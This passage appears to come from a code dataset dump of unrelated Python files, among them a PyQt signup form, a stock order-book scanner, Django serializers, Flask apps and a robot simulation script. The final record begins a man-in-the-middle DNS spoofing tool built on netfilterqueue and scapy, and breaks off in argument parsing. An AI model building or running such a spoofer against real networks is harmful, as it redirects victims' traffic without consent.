QtWidgets.QPushButton(self.centralwidget)\r\n self.Customeradd_btn.setGeometry(QtCore.QRect(230, 250, 331, 71))\r\n font = QtGui.QFont()\r\n font.setFamily(\"B Nazanin\")\r\n font.setPointSize(22)\r\n 
font.setBold(False)\r\n font.setWeight(50)\r\n self.Customeradd_btn.setFont(font)\r\n self.Customeradd_btn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.Customeradd_btn.setStyleSheet(\"QPushButton\\n\"\r\n\"{\\n\"\r\n\"color:rgb(61, 135, 255);\\n\"\r\n\"background-color:white;\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\\n\"\r\n\"QPushButton::pressed\\n\"\r\n\"{\\n\"\r\n\"color:white;\\n\"\r\n\"background-color: rgb(61, 135, 255);\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\")\r\n self.Customeradd_btn.setObjectName(\"Customeradd_btn\")\r\n #Connect pushbutton to costumer signup func\r\n self.Customeradd_btn.clicked.connect(self.gotocustomersignup)\r\n self.selleradd_btn = QtWidgets.QPushButton(self.centralwidget)\r\n self.selleradd_btn.setGeometry(QtCore.QRect(230, 410, 331, 71))\r\n font = QtGui.QFont()\r\n font.setFamily(\"B Nazanin\")\r\n font.setPointSize(22)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n self.selleradd_btn.setFont(font)\r\n self.selleradd_btn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.selleradd_btn.setStyleSheet(\"QPushButton\\n\"\r\n\"{\\n\"\r\n\"color:rgb(61, 135, 255);\\n\"\r\n\"background-color:white;\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\\n\"\r\n\"QPushButton::pressed\\n\"\r\n\"{\\n\"\r\n\"color:white;\\n\"\r\n\"background-color: rgb(61, 135, 255);\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\")\r\n self.selleradd_btn.setObjectName(\"selleradd_btn\")\r\n #Connectc pushbutton to sellersignup func\r\n self.selleradd_btn.clicked.connect(self.gotosellersignup)\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(30, 40, 731, 151))\r\n font = QtGui.QFont()\r\n font.setFamily(\"B Titr\")\r\n font.setPointSize(22)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label.setFont(font)\r\n self.label.setStyleSheet(\"color:rgb(61, 135, 255);\\n\"\r\n\"font-family:B Titr, Arial\")\r\n self.label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label.setObjectName(\"label\")\r\n SignupPanel.setCentralWidget(self.centralwidget)\r\n\r\n self.retranslateUi(SignupPanel)\r\n QtCore.QMetaObject.connectSlotsByName(SignupPanel)\r\n self.SignupPanel = SignupPanel\r\n\t\r\n\t#Costumer Signup Panel\r\n def gotocustomersignup(self):\r\n self.customerSignup = QtWidgets.QMainWindow()\r\n self.ui = customer_signup.Ui_CustomerSignup()\r\n self.ui.setupUi(self.customerSignup)\r\n self.customerSignup.show()\r\n self.SignupPanel.close()\r\n\t#Seller Signup panel\r\n def gotosellersignup(self):\r\n self.sellerSignup = QtWidgets.QMainWindow()\r\n self.ui = seller_signup.Ui_SellerSignup()\r\n self.ui.setupUi(self.sellerSignup)\r\n self.sellerSignup.show()\r\n self.SignupPanel.close()\r\n\r\n def retranslateUi(self, SignupPanel):\r\n _translate = QtCore.QCoreApplication.translate\r\n SignupPanel.setWindowTitle(_translate(\"SignupPanel\", \"Sign Up\"))\r\n SignupPanel.setWindowIcon(QIcon('Images/null.png'))\r\n self.Customeradd_btn.setText(_translate(\"SignupPanel\", \"مشتری\"))\r\n self.selleradd_btn.setText(_translate(\"SignupPanel\", \"فروشنده\"))\r\n self.label.setText(_translate(\"SignupPanel\", \"به آنلاین شاپ خوش آمدید\\n\"\r\n\"شیوه ثبت نام را انتخاب کنید\"))\r\n\r\n\r\nif 
__name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n SignupPanel = QtWidgets.QMainWindow()\r\n ui = Ui_SignupPanel()\r\n ui.setupUi(SignupPanel)\r\n SignupPanel.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"Options/signup_panel.py","file_name":"signup_panel.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"568346604","text":"# from urllib import request\nimport csv\nimport sys\nimport gevent\nimport tushare as ts\nimport datetime\nimport time\nimport os\nimport traceback\nimport datetime\nfrom gevent import monkey\nimport platform\nimport traceback\nimport codecs\nimport math\nfrom os.path import expanduser\n\nmonkey.patch_socket()\nbaseUrl = \"http://qt.gtimg.cn/q=\"\ntoday_str = datetime.datetime.now().strftime(\"%Y%m%d\")\ntoday_str_for_ts = datetime.datetime.now().strftime(\"%Y-%m-%d\")\nyuzhi = 10\nyuzhi_count = 30000\nyuzhi_guo = 500\n\nbase_dir = os.path.join(expanduser(\"~\"), 'news')\nsysstr = platform.system()\nif (sysstr == \"Windows\"):\n base_dir = \"D:\\\\news\"\nelif (sysstr == \"Linux\"):\n print(\"Call Linux tasks\")\n\n\ndef getfloat(value):\n try:\n return float(value)\n except ValueError:\n return 0\n\n\ndef write_file(data, file_name):\n with open(os.path.join(base_dir, file_name), 'a', encoding='utf8', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(data)\n\n\ndef cal(cur_file, code, cur_dir, tmp_code_inc):\n if not os.path.exists(cur_file):\n return\n\n last_time = ''\n last_inc = 0\n ready = []\n with codecs.open(cur_file, \"r\", encoding='utf-8', errors='ignore') as fdata:\n for row in fdata.readlines():\n sa = row.split(',')\n cur_time = sa[0]\n real_time = int(cur_time) % 1000000\n # code = sa[1]\n inc = getfloat(sa[7])\n last_inc = inc\n cur_vol = getfloat(sa[8])\n buy_price_1 = getfloat(sa[9])\n buy_count_1 = getfloat(sa[10])\n buy_price_2 = getfloat(sa[11])\n buy_count_2 = getfloat(sa[12])\n buy_price_3 = getfloat(sa[13])\n buy_count_3 = getfloat(sa[14])\n buy_price_4 = getfloat(sa[15])\n buy_count_4 = getfloat(sa[16])\n buy_price_5 = getfloat(sa[17])\n buy_count_5 = getfloat(sa[18])\n sell_price_1 = getfloat(sa[19])\n sell_count_1 = getfloat(sa[20])\n sell_price_2 = getfloat(sa[21])\n sell_count_2 = getfloat(sa[22])\n sell_price_3 = getfloat(sa[23])\n sell_count_3 = getfloat(sa[24])\n sell_price_4 = getfloat(sa[25])\n sell_count_4 = getfloat(sa[26])\n sell_price_5 = getfloat(sa[27])\n sell_count_5 = getfloat(sa[28])\n\n if last_time == cur_time:\n continue\n last_time = cur_time\n\n if sell_count_5 == 0 or buy_count_5 == 0:\n continue\n\n tot_buy_count = buy_count_1 + buy_count_2 + buy_count_3 + buy_count_4 + buy_count_5\n tot_sell_count = sell_count_1 + sell_count_2 + sell_count_3 + sell_count_4 + sell_count_5\n\n def help_buy(current_count, current_price, total_count, data_wirte):\n if current_count / (\n total_count - current_count + 1) > yuzhi \\\n and current_count * current_price > yuzhi_count \\\n and 93500 < real_time < 145000:\n data_wirte.append([code, 'B', cur_time[:8],cur_time[-6:], current_price, current_count, inc])\n print('----- OH -------', code, 'B', cur_time, current_price, current_count)\n\n def help_sell(current_count, current_price, total_count, data_wirte):\n if current_count / (\n total_count - current_count + 1) > yuzhi \\\n and current_count * current_price > yuzhi_count \\\n and 93500 < real_time < 145000:\n data_wirte.append([code, 'S', cur_time[:8],cur_time[-6:], 
current_price, current_count, inc])\n print('----- OH -------', code, 'S', cur_time, current_price, current_count)\n\n\n help_sell(sell_count_1, sell_price_1, tot_sell_count, ready)\n help_sell(sell_count_2, sell_price_2, tot_sell_count, ready)\n help_sell(sell_count_3, sell_price_3, tot_sell_count, ready)\n help_sell(sell_count_4, sell_price_4, tot_sell_count, ready)\n help_sell(sell_count_5, sell_price_5, tot_sell_count, ready)\n\n help_buy(buy_count_1, buy_price_1, tot_buy_count, ready)\n help_buy(buy_count_2, buy_price_2, tot_buy_count, ready)\n help_buy(buy_count_3, buy_price_3, tot_buy_count, ready)\n help_buy(buy_count_4, buy_price_4, tot_buy_count, ready)\n help_buy(buy_count_5, buy_price_5, tot_buy_count, ready)\n\n for r in ready:\n r.append(last_inc)\n r.append(tmp_code_inc)\n write_file(r, \"out.csv\")\n return last_inc\n\n\nif __name__ == '__main__':\n codes = ts.get_stock_basics().index.values\n dirs = os.listdir(base_dir)\n\n for code in codes:\n code_inc = -100\n for d in dirs:\n # print(code, ' ---- ', dir)\n code_inc = cal(os.path.join(base_dir, d, code + \".csv\", ), code, d, code_inc)\n","sub_path":"dayk/tc_jieduan.py","file_name":"tc_jieduan.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161099430","text":"\"\"\"\n49. Group Anagrams\nGiven an array of strings strs, group the anagrams together. \nYou can return the answer in any order.\nAn Anagram is a word or phrase formed by rearranging the letters \nof a different word or phrase, typically using all the original letters exactly once.\n\nExample 1:\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\nExample 2:\nInput: strs = [\"\"]\nOutput: [[\"\"]]\nExample 3:\nInput: strs = [\"a\"]\nOutput: [[\"a\"]]\n\nConstraints:\n1 <= strs.length <= 104\n0 <= strs[i].length <= 100\nstrs[i] consists of lower-case English letters.\n\"\"\"\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n if len(strs)==0:\n return [[\"\"]]\n if len(strs)==1:\n return [strs]\n \n res = []\n tmpD = {}\n \n for i in range(len(strs)):\n tmp = ''.join(sorted(list(strs[i])))\n if tmp not in tmpD :\n tmpD[tmp] = [strs[i]]\n else :\n tmpD[tmp].append(strs[i])\n #print(tmpD)\n for tmp in tmpD :\n res.append(tmpD[tmp])\n return res\n \n","sub_path":"LeetCode_exercises/ex0049_groupAnagrams.py","file_name":"ex0049_groupAnagrams.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537233287","text":"import os\nimport glob\nfrom conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\n\nclass BxConan(ConanFile):\n name = \"bx\"\n description = \"Base library used across multiple projects.\"\n license = \"BSD-2-Clause\"\n topics = (\"conan\", \"bx\")\n homepage = \"https://github.com/bkaradzic/bx\"\n url = \"https://github.com/conan-io/conan-center-index\"\n exports_sources = [\"CMakeLists.txt\"]\n generators = \"cmake\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"fPIC\": [True, False],\n }\n default_options = {\n \"fPIC\": True,\n }\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == 'Windows':\n del self.options.fPIC\n\n def 
configure(self):\n minimal_cpp_standard = \"14\"\n if self.settings.compiler.cppstd:\n tools.check_min_cppstd(self, minimal_cpp_standard)\n minimal_version = {\n \"gcc\": \"5\",\n \"clang\": \"3.4\",\n \"apple-clang\": \"10\",\n \"Visual Studio\": \"15\"\n }\n compiler = str(self.settings.compiler)\n if compiler not in minimal_version:\n self.output.warn(\n \"%s recipe lacks information about the %s compiler standard version support\" % (self.name, compiler))\n self.output.warn(\n \"%s requires a compiler that supports at least C++%s\" % (self.name, minimal_cpp_standard))\n return\n version = tools.Version(self.settings.compiler.version)\n if version < minimal_version[compiler]:\n raise ConanInvalidConfiguration(\"%s requires a compiler that supports at least C++%s\" % (self.name, minimal_cpp_standard))\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n extracted_dir = glob.glob('bx-*/')[0]\n os.rename(extracted_dir, self._source_subfolder)\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.configure(build_folder=self._build_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n self.copy(pattern=\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n self.cpp_info.includedirs.append(os.path.join(\"include\", \"bx\", \"compat\"))\n if self.settings.os == \"Linux\":\n self.cpp_info.system_libs = [\"dl\", \"pthread\", \"rt\"]\n if self.settings.os == \"Macos\":\n self.cpp_info.frameworks = [\"Foundation\"]\n","sub_path":"recipes/bx/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"632233994","text":"\"\"\"\n\n\tAuthor : John Turner\n\tVersion: 2.0\n\t\n\tLast Updated: 8/29/15\n\tUpdated By : John Turner\n\t\n\tFile that will contain all of the serializers for the REST API calls from the iPad App\n\tto the web server. 
\n\n\"\"\"\n\nfrom rest_framework import serializers\nfrom base_app import models as mod\nimport datetime\n\n# Serializer class for the Company model\nclass CompanySerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.Company\n\n# Serializer class for the User model\nclass UserSerializer(serializers.ModelSerializer):\n\n\tclass Meta: \n\t\tmodel = mod.User\n\t\tfields = ('id','first_name','last_name','password','email','company',)\n\t\twrite_only_fields = ('password',)\n\n\tdef create(self, validated_data):\n\t\t\"\"\"\n\t\tCall set_password so the password isn't stored in plain text\n\t\tAlso adds the user to the Recruiter group.\n\t\t\"\"\"\n\n\t\tuser = mod.User(\n\t\t\temail =validated_data['email'],\n\t\t\tfirst_name =validated_data['first_name'],\n\t\t\tlast_name =validated_data['last_name'],\n\t\t\tcompany =validated_data['company']\n\t\t)\n\t\tuser.set_password(validated_data['password'])\n\n\t\tuser.save()\n\n\t\t# Add recruiter to the recruiter group\n\t\tgroup = mod.Group.objects.get(name='Recruiter')\n\t\tgroup.user_set.add(user)\n\n\t\treturn user\n\n# Serializer class for the Vehicle model\nclass VehicleSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.Vehicle\n\n# Serializer class for the SaladDressing model\nclass SaladDressingSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.SaladDressing\n\n# Serializer class for the MenuItem model\nclass MenuItemSerializer(serializers.ModelSerializer):\n\n\tdefault_dressing = SaladDressingSerializer(read_only=True, required=False)\n\tphoto = serializers.SerializerMethodField('get_image_url')\n\n\tclass Meta:\n\t\tmodel = mod.MenuItem\n\t\tread_only_fields = ('name','photo','category','description',)\n\n\tdef get_image_url(self, obj):\n\t\ttry:\n\t\t\tphoto = obj.photo.url\n\t\texcept ValueError:\n\t\t\tphoto = None\n\n\t\treturn photo\n\n# Serializer class for the CheckIn model\nclass CheckInSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.CheckIn\n\n\tdef create(self, validated_data):\n\t\t\"\"\"\n\t\tMake sure to look up the recruiter according to the id \n\t\tthat the app passes\n\t\t\"\"\"\n\n\t\tcheck_in = mod.CheckIn()\n\t\tcheck_in.date = datetime.datetime.now()\n\t\tcheck_in.recruiter = validated_data['recruiter']\n\n\t\tcheck_in.save()\n\n\t\treturn check_in\n\n# Serializer class for the LunchOrder model\nclass LunchOrderSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.LunchOrder\n\n\tdef create(self, validated_data):\n\t\t\"\"\"\n\t\tMake sure that all of the different relationships passed in from the \n\t\tapp are correctly set before saving the LunchOrder\n\t\t\"\"\"\n\n\t\tprint(\"<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>\")\n\n\t\tlunch_order = mod.LunchOrder()\n\t\tlunch_order.check_in = validated_data['check_in']\n\t\tlunch_order.dessert = validated_data['dessert']\n\t\tlunch_order.menu_item = validated_data['menu_item']\n\t\tlunch_order.date = datetime.datetime.now()\n\n\t\t# Check to see if there is a salad dressing at all\n\t\tif 'salad_dressing' in validated_data:\n\t\t\tif validated_data['salad_dressing'] != \"\":\n\t\t\t\tlunch_order.salad_dressing = validated_data['salad_dressing']\n\n\t\t# Save the lunch order, then add the ingredients to it\n\t\tlunch_order.save()\n\n\t\tif 'ingredients' in validated_data:\n\t\t\tfor ingredient in validated_data['ingredients']:\n\t\t\t\tlunch_order.ingredients.add(ingredient)\n\n\t\tlunch_order.save()\n\n\t\treturn lunch_order\n\n# Serializer class for the 
ingredients\nclass IngredientSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.Ingredient\n\n# Serializer class for the Desserts\nclass DessertSerializer(serializers.ModelSerializer):\n\t\n\tclass Meta:\n\t\tmodel = mod.Dessert","sub_path":"base_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"394367864","text":"from flask import Flask, jsonify, render_template\nfrom flask_socketio import SocketIO, emit\nimport sqlite3\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'arnsetiorsn'\nsocketio = SocketIO(app)\n\nUSERS = 'users.db'\n# with sqlite3.connect(USERS) as db:\n# cursor = db.cursor()\n# cursor.execute('CREATE TABLE users (username TEXT, secret INTEGER)')\n# cursor.execute('INSERT INTO users VALUES (\"admin\", 0)')\n\n\n@app.route('/')\ndef index():\n return render_template('test.html')\n with sqlite3.connect(USERS) as db:\n cursor = db.cursor()\n secret = cursor.execute(\n 'SELECT secret FROM users WHERE username = \"admin\"').fetchall()\n cursor.execute(\n 'UPDATE users SET secret = ? WHERE username = \"admin\"', (secret[0][0] + 1,))\n return jsonify(secret)\n\n\n@socketio.on('upload')\ndef message(text):\n emit('download', text)\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307736764","text":"# -*- coding: utf-8 -*-\n\"\"\"SIP Master Controller (REST).\"\"\"\nimport os\n\nimport redis\nfrom flask import request\nfrom flask_api import FlaskAPI, status\n\n\nAPP = FlaskAPI(__name__)\nDB = redis.Redis(host=os.getenv('DATABASE_HOST'))\n\n\n@APP.route('/')\ndef root():\n \"\"\".\"\"\"\n return {\n \"message\": \"Welcome to the SIP Master Controller\",\n \"_links\": {\n \"items\": [\n {\"href\": \"{}state\".format(request.url)}\n ]\n }\n }\n\n\n@APP.route('/state', methods=['GET', 'PUT'])\ndef state():\n\n \"\"\"Return the SDP State.\"\"\"\n states = ['OFF', 'INIT', 'STANDBY', 'ON', 'DISABLE', 'FAULT', 'ALARM',\n 'UNKNOWN']\n\n if request.method == 'PUT':\n requested_state = request.data.get('state', '').upper()\n if requested_state not in states:\n return ({'error': 'Invalid state: {}'.format(requested_state),\n 'allowed_states': states},\n status.HTTP_400_BAD_REQUEST)\n response = {'message': 'Accepted state: {}'.format(requested_state)}\n try:\n DB.set('state', requested_state)\n except redis.exceptions.ConnectionError:\n response['error'] = 'Unable to connect to database.'\n return response\n\n try:\n current_state = DB.get('state')\n if current_state is None:\n DB.set('state', 'INIT')\n current_state = 'INIT'\n else:\n current_state = current_state.decode('utf-8')\n return {'state': '{}'.format(current_state)}\n except redis.exceptions.ConnectionError:\n return {'state': 'UNKNOWN',\n 'error': 'Unable to connect to database.'}\n","sub_path":"sip/execution_control/master_controller/rest/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288598955","text":"# the file allStar_v603_good_vscat_starflag_teff_logg_aspcapflags.fits was\n# created using topcat, and contains all of the bad star information except\n# for the PARAMFLAG (topcat couldn't read it)\n# so, excise the stars with bad 
PARAMFLAG...\n\nimport pyfits\nimport numpy as np\n\nfilein = \"allStar_v603_good_vscat_starflag_teff_logg_aspcapflags.fits\"\nhdulist = pyfits.open(filein)\na = hdulist[1].data\nparamflag = a['PARAMFLAG']\nteff_flag = paramflag[:,0] != 0\nlogg_flag = paramflag[:,1] != 0\nmh_flag = paramflag[:,3] != 0\nalpha_flag = paramflag[:,4] != 0\nparamflag_bad = teff_flag | logg_flag | mh_flag | alpha_flag\nnstars = len(paramflag_bad)\nids = a['APOGEE_ID']\nhdulist.close()\n\ninputf = \"allStar_v603_good_vscat_starflag_teff_logg_aspcapflags.txt\"\napogee_id_all = np.loadtxt(inputf, usecols=(0,), dtype=str)\nlabels_all = np.loadtxt(inputf, usecols=(1,2,3,4,5,6,7,8), dtype=float)\napogee_id = apogee_id_all[~paramflag_bad]\nlabels = labels_all[~paramflag_bad]\n\nnp.savez(\"apogee_dr12_labels\", apogee_id, labels)\n","sub_path":"data/apogee_DR12/labels/excise_bad_paramflag.py","file_name":"excise_bad_paramflag.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255628113","text":"# В единственной строке записан текст. Для каждого слова из данного текста подсчитайте, \n# сколько раз оно встречалось в этом тексте.\n# Задачу необходимо решить с использованием словаря.\n\nfrom pprint import pprint\n\ninp = input('Введите строку: ')\nlst = inp.split(' ')\ndct = {}\n\nfor element in lst:\n if element in dct:\n dct[element] += 1\n else:\n dct[element] = 1\n\npprint(dct)","sub_path":"7.3 — DictTimes.py","file_name":"7.3 — DictTimes.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"550760538","text":"# Copyright 2017 Big Ladder Software LLC, All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# (1) Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# (2) Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# \n# (3) Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission. \n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER, THE UNITED STATES\n# GOVERNMENT, OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport json\nimport main\n\nREPO_URL = \"https://github.com/lbl-srg/modelica-buildings\"\nNEW_BRANCH = \"master\"\nOLD_BRANCH = \"v4.0.0\"\nOLD_API_FILE = \"api-\" + OLD_BRANCH + \".json\"\nNEW_API_FILE = \"api-\" + NEW_BRANCH + \".json\"\nDIFFS_FILE = \"diffs-\" + NEW_BRANCH + \"-vs-\" + OLD_BRANCH + \".json\"\n\nmain.clone_repo_to(REPO_URL, OLD_BRANCH, OLD_BRANCH)\nmain.clone_repo_to(REPO_URL, NEW_BRANCH, NEW_BRANCH)\nmain.call_api_generator(OLD_BRANCH, OLD_API_FILE)\nmain.call_api_generator(NEW_BRANCH, NEW_API_FILE)\nmain.call_version_checker(OLD_API_FILE, NEW_API_FILE, DIFFS_FILE)\n\nwith open(OLD_API_FILE) as fid:\n old_data = fid.read()\nwith open(NEW_API_FILE) as fid:\n new_data = fid.read()\nwith open(DIFFS_FILE) as fid:\n diff_data = fid.read()\n\nold_api = json.loads(old_data)\nnew_api = json.loads(new_data)\ndiffs = json.loads(diff_data)\n","sub_path":"UsageExample/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"565559440","text":"# coding: utf-8\nimport os\nimport sys\n# 在当前路径执行django 功能类似manage.py\nsys.path.append('C:\\\\NLPengine')\nos.environ['DJANGO_SETTINGS_MODULE'] = 'NLPengine.settings'\nfrom query.models import TagList\nfrom fermiNLP import gl\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(message)s', datefmt='%a, %d %b %Y %H:%M:%S')\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\nif __name__ == '__main__':\n uniTags = []\n TagsHeat = []\n logging.info('Start Building TagList')\n for i in range(0, gl.topicCount):\n a = gl.lda.show_topic(topicid=i, topn=10)\n for j in a:\n uniTags.append(j[1])\n logging.info('Remove duplicate tags')\n uniTags = set(uniTags)\n logging.info('Save Tag to DB')\n for i in uniTags:\n tag = TagList(tag=i)\n tag.save()\n logging.info('TagList contribution Complete!')\n","sub_path":"query/TagList.py","file_name":"TagList.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223970149","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 12\n\n@author: enrique benavides\n\"\"\"\n\nimport sim\nimport sys\nimport time\nimport numpy as np\n\nN = 4\n\n##### Conexión con Coppelia #####\nsim.simxFinish(-1) # Cerrar conexiones existentes\nclientID=sim.simxStart('127.0.0.1',19997,True,True,5000,5) # Conectarse a Coppelia\n\nif clientID!=-1:\n print (\"Iniciar conexion con servidor API\")\nelse:\n print (\"Fallo de conexion\")\n sys.exit('Saliendo')\n\n\nROBOT = [\"lumibot_Frame\"]\nROBOT_LM = [\"lumibot_leftMotor\"]\nROBOT_RM = [\"lumibot_rightMotor\"]\nfor i in range(N-1):\n ROBOT.append(\"lumibot_Frame#\" + str(i))\n ROBOT_LM.append(\"lumibot_leftMotor#\" + str(i+1))\n ROBOT_RM.append(\"lumibot_rightMotor#\" + str(i+1))\n\nRAMxx = []\nRAMxx_LM = []\nRAMxx_RM = []\nfor i in range(N):\n eCode, LM = sim.simxGetObjectHandle(clientID, 
ROBOT_LM[i], sim.simx_opmode_oneshot_wait)\n RAMxx_LM.append(LM)\n eCode, RM = sim.simxGetObjectHandle(clientID, ROBOT_RM[i], sim.simx_opmode_oneshot_wait)\n RAMxx_RM.append(RM)\n eCode, RAM = sim.simxGetObjectHandle(clientID, ROBOT[i], sim.simx_opmode_oneshot_wait)\n RAMxx.append(RAM)\n \nX0 = []\nY0 = []\nXi0 = []\nfor i in range(N):\n eCode, pos_par = sim.simxGetObjectPosition(clientID, RAMxx[i], -1, sim.simx_opmode_streaming)\n eCode, ori_par = sim.simxGetObjectOrientation(clientID, RAMxx[i], -1, sim.simx_opmode_streaming)\n time.sleep(0.2)\n eCode, pos_par = sim.simxGetObjectPosition(clientID, RAMxx[i], -1, sim.simx_opmode_buffer)\n eCode, ori_par = sim.simxGetObjectOrientation(clientID, RAMxx[i], -1, sim.simx_opmode_buffer)\n \n X0 = np.append(X0,pos_par[0])\n Y0 = np.append(Y0,pos_par[1])\n Xi0 = np.append(Xi0,ori_par[2])\n \nprint ('Closing connection with API server')\ntime.sleep(1)\nsim.simxFinish(-1)","sub_path":"CONDA/00Tesis/PruebaMultiRobots.py","file_name":"PruebaMultiRobots.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"213693204","text":"#!/usr/bin/env python\n\nimport netfilterqueue # provides access to packets matched by an iptables rule in Linux. Packets so matched can be accepted, dropped, altered, or given a mark.\nimport scapy.all as scapy # handle tasks like scanning and network discovery\nimport argparse # get values as arguments\nimport subprocess # run() function for shell commands\n\n\n# function that handles the user arguments\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--target\", dest=\"target\", help=\"Target domain name.\")\n parser.add_argument(\"-i\", \"--ip\", dest=\"ip\", help=\"Modified IP.\")\n parser.add_argument(\"-p\", \"--preference\", dest=\"preference\", help=\"0 for local, 1 for man-in-the-middle.\")\n parser.add_argument(\"-q\", \"--queue\", dest=\"queue_num\", help=\"Number(int) of queue.\")\n options = parser.parse_args()\n if not options.target:\n parser.error(\"[-] Please specify a target, use --help for more info.\")\n elif not options.ip:\n parser.error(\"[-] Please specify an ip, use --help for more info.\")\n elif not options.preference in [\"0\", \"1\"]:\n parser.error(\"[-] Please specify a preference, use --help for more info.\")\n elif not options.queue_num:\n parser.error(\"[-] Please specify a queue number, use --help for more info.\")\n elif not options.queue_num.isdigit():\n 